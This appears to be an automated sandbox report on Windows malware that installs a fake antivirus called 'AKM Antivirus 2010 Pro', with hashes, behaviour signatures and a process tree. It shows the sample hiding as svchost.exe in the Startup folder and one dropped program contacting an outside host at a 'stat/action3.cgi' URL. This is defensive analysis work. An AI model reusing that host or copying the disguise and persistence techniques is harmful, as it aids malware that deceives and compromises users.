Analysis
-
max time kernel
149s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe
-
Size
1.4MB
-
MD5
65db70d3bde8cab4ee6fc955548fb933
-
SHA1
f4b2810261631e7895489d9c097f788fa35c5930
-
SHA256
95975470125c1bca6801434105518e932b2bf0aca14ad626f2814e29f3b8c01f
-
SHA512
ac4cbfda3d7f6236f7e3c160d3b042930fd7d9e646abea49f3f57c53191773c66ae926b998fdb40d23c1a2c6415edc07ff019a148aa6884c11e655f360a2c0a9
-
SSDEEP
24576:ZhsROjFH2anRtRdYtJeIqybrF9xBhWU0B9FCXqB0ZEOMq+hbXfo5ax6qtOP3BcmT:ZtR28RdYtJJqybB9tWU0B9gg0ZEOMq+K
Malware Config
Signatures
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe AKM Antivirus 2010 Pro.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe AKM Antivirus 2010 Pro.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe svchost.exe -
Executes dropped EXE 12 IoCs
pid Process 2748 AKM Antivirus 2010 Pro.exe 2644 svchost.exe 2648 svchost.exe 1592 AKM Antivirus 2010 Pro.exe 2420 win891E.tmp 3020 svchost.exe 612 AKM Antivirus 2010 Pro.exe 1608 alggui.exe 1964 AKM Antivirus 2010 Pro.exe 1340 AKM Antivirus 2010 Pro.exe 2996 AKM Antivirus 2010 Pro.exe 3048 AKM Antivirus 2010 Pro.exe -
Loads dropped DLL 19 IoCs
pid Process 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2644 svchost.exe 2644 svchost.exe 2644 svchost.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2648 svchost.exe 2648 svchost.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2644 svchost.exe 2648 svchost.exe 2644 svchost.exe 2648 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2748 AKM Antivirus 2010 Pro.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 2420 win891E.tmp 2420 win891E.tmp 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe 1608 alggui.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2748 AKM Antivirus 2010 Pro.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 2748 AKM Antivirus 2010 Pro.exe 2748 AKM Antivirus 2010 Pro.exe 612 AKM Antivirus 2010 Pro.exe 1592 AKM Antivirus 2010 Pro.exe 1964 AKM Antivirus 2010 Pro.exe 1340 AKM Antivirus 2010 Pro.exe 2996 AKM Antivirus 2010 Pro.exe 3048 AKM Antivirus 2010 Pro.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 2096 wrote to memory of 2748 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 30 PID 2096 wrote to memory of 2748 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 30 PID 2096 wrote to memory of 2748 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 30 PID 2096 wrote to memory of 2748 2096 65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe 30 PID 2748 wrote to memory of 2644 2748 AKM Antivirus 2010 Pro.exe 31 PID 2748 wrote to memory of 2644 2748 AKM Antivirus 2010 Pro.exe 31 PID 2748 wrote to memory of 2644 2748 AKM Antivirus 2010 Pro.exe 31 PID 2748 wrote to memory of 2644 2748 AKM Antivirus 2010 Pro.exe 31 PID 2644 wrote to memory of 2648 2644 svchost.exe 32 PID 2644 wrote to memory of 2648 2644 svchost.exe 32 PID 2644 wrote to memory of 2648 2644 svchost.exe 32 PID 2644 wrote to memory of 2648 2644 svchost.exe 32 PID 2644 wrote to memory of 1592 2644 svchost.exe 33 PID 2644 wrote to memory of 1592 2644 svchost.exe 33 PID 2644 wrote to memory of 1592 2644 svchost.exe 33 PID 2644 wrote to memory of 1592 2644 svchost.exe 33 PID 2748 wrote to memory of 2420 2748 AKM Antivirus 2010 Pro.exe 34 PID 2748 wrote to memory of 2420 2748 AKM Antivirus 2010 Pro.exe 34 PID 2748 wrote to memory of 2420 2748 AKM Antivirus 2010 Pro.exe 34 PID 2748 wrote to memory of 2420 2748 AKM Antivirus 2010 Pro.exe 34 PID 2648 wrote to memory of 3020 2648 svchost.exe 35 PID 2648 wrote to memory of 3020 2648 svchost.exe 35 PID 2648 wrote to memory of 3020 2648 svchost.exe 35 PID 2648 wrote to memory of 3020 2648 svchost.exe 35 PID 2648 wrote to memory of 612 2648 svchost.exe 36 PID 2648 wrote to memory of 612 2648 svchost.exe 36 PID 2648 wrote to memory of 612 2648 svchost.exe 36 PID 2648 wrote to memory of 612 2648 svchost.exe 36 PID 2748 wrote to memory of 1608 2748 AKM Antivirus 2010 Pro.exe 38 PID 2748 wrote to memory of 1608 2748 AKM Antivirus 2010 Pro.exe 38 PID 2748 wrote to memory of 1608 2748 AKM Antivirus 2010 Pro.exe 38 PID 2748 wrote to memory of 1608 2748 AKM Antivirus 2010 Pro.exe 38 PID 2420 wrote to memory of 1116 2420 win891E.tmp 20 PID 2420 wrote to memory of 1116 2420 win891E.tmp 20 PID 2420 wrote to memory of 1116 2420 win891E.tmp 20 PID 2420 wrote to memory of 1116 2420 win891E.tmp 20 PID 2420 wrote to memory of 1040 2420 win891E.tmp 17 PID 2420 wrote to memory of 1040 2420 win891E.tmp 17 PID 2420 wrote to memory of 1040 2420 win891E.tmp 17 PID 2420 wrote to memory of 1040 2420 win891E.tmp 17 PID 2644 wrote to memory of 1964 2644 svchost.exe 41 PID 2644 wrote to memory of 1964 2644 svchost.exe 41 PID 2644 wrote to memory of 1964 2644 svchost.exe 41 PID 2644 wrote to memory of 1964 2644 svchost.exe 41 PID 2648 wrote to memory of 1340 2648 svchost.exe 42 PID 2648 wrote to memory of 1340 2648 svchost.exe 42 PID 2648 wrote to memory of 1340 2648 svchost.exe 42 PID 2648 wrote to memory of 1340 2648 svchost.exe 42 PID 2644 wrote to memory of 2996 2644 svchost.exe 43 PID 2644 wrote to memory of 2996 2644 svchost.exe 43 PID 2644 wrote to memory of 2996 2644 svchost.exe 43 PID 2644 wrote to memory of 2996 2644 svchost.exe 43 PID 2648 wrote to memory of 3048 2648 svchost.exe 44 PID 2648 wrote to memory of 3048 2648 svchost.exe 44 PID 2648 wrote to memory of 3048 2648 svchost.exe 44 PID 2648 wrote to memory of 3048 2648 svchost.exe 44
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1040
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1116
-
C:\Users\Admin\AppData\Local\Temp\65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\65db70d3bde8cab4ee6fc955548fb933_JaffaCakes118.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"6⤵
- Executes dropped EXE
PID:3020
-
-
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:612
-
-
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1340
-
-
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3048
-
-
-
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1592
-
-
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1964
-
-
C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\Admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2996
-
-
-
C:\Users\Admin\AppData\Local\Temp\win891E.tmpC:\Users\Admin\AppData\Local\Temp\win891E.tmp "http://core2700.freesourceforyou.com/stat/action3.cgi?p=3&a=2700" "C:\Users\Admin\AppData\Local\Temp\win88B0.tmp" 14⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2420
-
-
C:\Users\Admin\AppData\Roaming\alggui.exe"C:\Users\Admin\AppData\Roaming\alggui.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1608
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5ed21b352d000691f00ebbe08b265db66
SHA13c1dc4a1f0dac17d362798af7fc3b41718ce39b2
SHA25662ed3c2009d67df1d28e8c80e311b2243f94e10d4a83ed014166257f734d7b24
SHA5127979e7d2d1f8482a95a64742074d627fb3ee6d317f836a1737d9faf25011207a64694148ae572ae23c0ad596e71cba8f69ce79f83964c705decd5212a127fdc0
-
Filesize
1.4MB
MD565db70d3bde8cab4ee6fc955548fb933
SHA1f4b2810261631e7895489d9c097f788fa35c5930
SHA25695975470125c1bca6801434105518e932b2bf0aca14ad626f2814e29f3b8c01f
SHA512ac4cbfda3d7f6236f7e3c160d3b042930fd7d9e646abea49f3f57c53191773c66ae926b998fdb40d23c1a2c6415edc07ff019a148aa6884c11e655f360a2c0a9
-
Filesize
80B
MD520656e82580fe329d500a1e4b5f52d86
SHA185d63ed2d4437b0b96380c3c945f7ffb18a3b371
SHA256a7794f333259946b8389f5615fca99d43d29da43c58b51f5a190912d3b053959
SHA512f41ecaf1a5954bfe954403227b82e84b1a65006049cb892a06568f6f4095bcdfc3a04679a015e1a0a8553d41f237f8cc700d4608338414c161db590c65dc0be0
-
Filesize
55KB
MD536897f92a5448fd3066b56000e6b70b4
SHA154b61b272ee8e0ce9496030508060982b95ef3ce
SHA256a87671ca271ded7ed1ce7cb6a693791dcf96ba72734c39d13e842a8e0a0e9556
SHA512fc2f7cccec8863afc6cc4559c3d2f451a46eca927790fc15eacf49e1a95997aa310a99f42c667e990e6f62e0726781bdb63a52ff4997f47440dd1b955601914d
-
Filesize
45KB
MD5eb9ca021b0c180b0cbb0057e49b3e660
SHA1b0e7fe042c9131b44ac99ecd86643b503b7a30e6
SHA2569f15880a3f92474d5f91d6cb086cb86fbfe50dc4dccd493c02688c3806a6224a
SHA51241effe6e16af638d523c6af93c55eb870bc4214b4d785da7d5b0b76fc00581973dd398a79fb2db98bac49e1b8dfe1e08f68caf17e2eb1a914d2c0057a41bcff5